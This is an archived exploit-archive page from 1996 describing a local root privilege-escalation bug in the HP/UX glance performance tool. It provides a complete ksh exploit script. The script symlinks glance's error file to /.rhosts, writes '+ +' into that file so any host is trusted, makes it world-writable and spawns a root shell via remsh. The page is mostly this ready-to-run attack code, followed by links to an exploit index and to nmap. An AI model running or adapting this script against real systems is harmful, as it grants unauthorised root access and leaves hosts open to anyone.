HP/UX SOD glance bug
| Description: | symlink bug due to poor error file creation |
| Author: | Colonel Panic of SOD (sod@command.com.inter.net) |
| Compromise: | root (local) |
| Vulnerable Systems: | HP/UX with vulnerable /usr/perf/bin/glance , probably just 9.x |
| Date: | October 1996 |
| Notes: | See the SOD HP Bug of the Week page |
Exploit:
#!/bin/ksh
# exploit to work against the latest rev that I know of for glance+
# Tested on 9000/700.. Don't even know if it's available on 10.X
# You could've done this next week. .traz
if [ ! -x /usr/perf/bin/glance ]
then
echo 'No diablo programme.'
echo 'Que si como es que.'
exit
fi
PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
echo '+ +' > /.rhosts
if [ -f /tmp/rhosts-save ]
then
cat /tmp/rhosts-save >> /.rhosts
rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away? Why does this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
